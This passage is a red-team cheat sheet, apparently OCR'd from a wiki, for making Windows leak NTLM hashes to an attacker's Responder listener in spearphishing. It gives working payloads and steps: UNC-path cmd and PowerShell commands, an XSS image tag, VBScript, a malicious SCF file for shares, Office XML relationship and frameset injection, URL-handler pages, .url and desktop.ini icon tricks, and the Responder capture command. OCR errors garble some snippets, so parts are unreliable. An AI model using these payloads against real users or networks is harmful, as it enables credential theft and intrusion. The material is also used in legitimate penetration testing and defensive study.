illicit authentication action. Below are some methods and references about learning more to use in your next Red Team spearphish campaign, rouge website, or document. ## WINDOWS COMMANDS Various Windows commands can allow you to illicit an NTLMv1/v2 authentication leak. Their usefulness in an actual scenario I'll leave up to the user. ```cmd C:\> dir \\<Responder IPAddr>\C$ C:\> regsvr32 /s /u /i://<Responder_IPAddr>/blah example.dll C:\> echo 1 > //<Responder_IPAddr>/blah C:\> pushd \\<Responder_IPAddr>\C$\blah C:\> cmd /k \\<Responder_IPAddr>\C$\blah C:\> cmd /c \\<Responder_IPAddr>\C$\blah C:\> start \\<Responder_IPAddr>\C$\blah C:\> mkdir \\<Responder_IPAddr>\C$\blah C:\> type \\<Responder_IPAddr>\C$\blah ``` ## POWERSHELL COMMANDS Various Windows PowerShell commands can allow you to illicit an NTLMv1/v2 authentication leak. Their usefulness in a scenario I'll leave up to the user. ```PowerShell PS> Invoke-Item \\<Responder_IPAddr>\C$\blah PS> Get-Content \\<Responder_IPAddr>\C$\blah PS> Start-Process \\<Responder_IPAddr>\C$\blah ``` ## INTERNET EXPLORER & EDGE BROWSERS Malicious hosted img source references can cause browsers to leak NTLMvl/v2 hash responses when retrieving the image file. example.htm ```html < I DOCTYPE html> <html> <img src="file://<Responder_IPAddr>/path/example.png"/> </html> ``` ## XSS INJECTION If you can pull off an XSS injection you can insert the below to have Internet Explorer browsers leak an NTLMvl/v2 hash. ```html <img src="\\\\<Responder_IPAddr>\\path\example.png"> ``` ## VBSCRIPT You can insert VBScript references into webpages, however this only works against Internet Explorer browsers. <html> <script type="text/Vbscript"> <I-- Set fso = CreateObject("Scripting.FileSystemObject") Set file = fso.OpenTextFile("//<Responder_IPAddr>/blah", 1) II--> </script> </html> ## SCF File SCENARIO: You have user creds or the ability to write a file to an unauthenticated Windows share on the target network. Now you can craft a malicious SCF file and place it on a frequented location on the fileshare to collect users NTLMvl/NTLMv2 hashes that browse the share with Windows Explorer. STEP 1: Create an .scf text file named '@InvoiceReqs.scf', insert the below text, and place it in what appears to be a frequently visited location on the share. The file needs to be viewed by Windows Explorer so ensure the filename forces it to be near the top of the targeted share/directory: ```bash [Shell] Command=2 IconFile=\\<Responder_IPAddr>\share\test.ico [Taskbar] Command=ToggleDesktop ``` STEP 2: Start Responder to listen and capture any users that browse the fileshare location: ```bash python Responder.py -wrf --lm -v -I <interface> ``` ## OFFICE DOCUMENTS SETTINGS.XML.RELS You can set external content in DOCX files via the template file, which you can view/edit with 7zip, located at C:\example.docx\word\_rels\settings.xml.rels. !!CAVEAT!! If the file is opened in Protected View this trick will not work, i.e emailed or hosted on a website. ```html <?xml version="l,0" encoding="UTF-8" standalone="yes"?> ``` <Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"> <Relationship Id="ridl" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attach edTemplate" Target="file://<Responder_IPAddr>/example/Template.dotx" TargetMode="External"/> </Relationships> ## FRAMESETS WEBSETTINGS.XML.RELS Microsoft documents can support web-editing and therefore frameset HTLM elements can be added. This can be abused to link a Word document to a LINC path. STEP 1: First we will need to create a malicious Word DOCX file and then extract/open it with 7zip to view the xml file structures inside. STEP 2: Under the following extracted path C:\example.docx\word\webSettings.xml you need to add the frameset to the 'webSettings.xml' file editing and creating a link to another file r:id="nEtMuxl". Save this file back when edited. ```html <w:frameset> <w:framesetSplitbar> <w:w w:val="60"/> <w:color w:val="auto"/> <w:noBorder/> </w:framesetSplitbar> <w:frameset> <w:frame> <w:name w:val="3"/> <w:sourceFileName r:id="nEtMuxl"/> <w:linkedToFile/> </w:frame> </w:frameset> </w:frameset> ``` STEP 3: Create a new file 'webSettings.xml.refs' and save it under the following path C:\example.docx\word\_rels\webSettings.xml.refs with the new Relationship Id 'nEtMuxl'we created earlier. Also we will insert our Responder location in the Target value. ```html <?xml version="l.0" encoding="UTF-8" standalone="yes"?> <Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"> <Relationship Id="nEtMuxl" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame" Target="\\<Responder_IPAddr>\Microsoft_Office_Updates.docx" TargetMode="External"/> </Relationships> ``` STEP 4: Once your target opens this file it will attempt to call out to the external content resource via the frameset. ## URL HANDLERS Abusing custom URL schemes registered by Microsoft to open a file from a UNC path and cause the leakage of NTLMvl/v2 hashes. Scheme Names ```html ms-word: ms-powerpoint: ms-excel: ms-visio: ms-access: ms-project: ms-publisher: ms-spd: ms-infopath: < I DOCTYPE html> <html> <script> location.href </script> </html> 'ms-word:ofelul\\<Responder_IPAddr>\path\example.docx'; ``` ## INTERNET SHORTCUTS .URL FILE Simply create a malicious shortcut using a .url file to direct users to your listening Responder. example.url: ```html [InternetShortcut] URL=file://<Responder_IPAddr>/path/example.html ``` You can also reference an icon for your internet shortcut link file so each time a user simply browses to or views the link, Windows will attempt to load the icon, leaking the NTLMvl/v2 hash. ```html example.url: [InternetShortcut] URL=https://netmux.com Iconindex=0 IconResource=\\<Responder_IPAddr>\path\example.ico ,INI FILE ``` You can also create a 'desktop.ini' file inside a directory with a malicious reference to the icon file. When viewed in Windows Explorer the system will try to resolve the icon reference: desktop.ini: ```html [.ShellClassinfo] IconResource=\\<Responder_IPAddr>\path\example.ico ``` ## WINDOWS SCRIPT FILES You can create a .wsf file and attempt to have a user run this script file which will leak an NTLMvl/v2 authentication attempt. example, wsf. REFERENCES - Living off the land: stealing NetNTLM hashes https://www.securify.nl/blog/SFY20180S0l/living-off-the-land_-stealing-netntlmhashes.html - Capturing NetNTLM Hashes with Office (DOT) XML Documents https://bohops.com/2018/08/04/capturing-netntlm-hashes-with-office-dot-xmldocuments/ - Microsoft Office - NTLM Hashes via Frameset https://pentestlab.blog/2017/12/18/microsoft-office-ntlm-hashes-via-frameset/ - Places of Interest in Stealing NetNTLM Hashes https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlmhashes/ - Bad-PDF https://github.com/deepzec/Bad-Pdf https://research.checkpoint.com/ntlm-credentials-theft-via-pdf-files/ https://github.com/3gstudent/Worse-PDF - Hashjacking - gif 5MB hash https://github.com/hob0/hashjacking - From e-mail to NTLM hashes with Microsoft Outlook https://wildfire.blazeinfosec.com/love-letters-from-the-red-team-from-e-mail-tontlm-hashes-with-microsoft-outlook/ - Leveraging web application vulnerabilities to steal NTLM hashes https://blog.blazeinfosec.com/leveraging-web-application-vulnerabilities-tosteal-ntlm-hashes-2/ - 5MB hash hijacking & user tracking in MS Outlook https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/may/smbhash-hijacking-and-user-tracking-in-ms-outlook/ - SCF File https://room362.com/post/2016/smb-http-auth-capture-via-scf/ https://1337red.wordpress.com/using-a-scf-file-to-gather-hashes/ [[Home]] #howto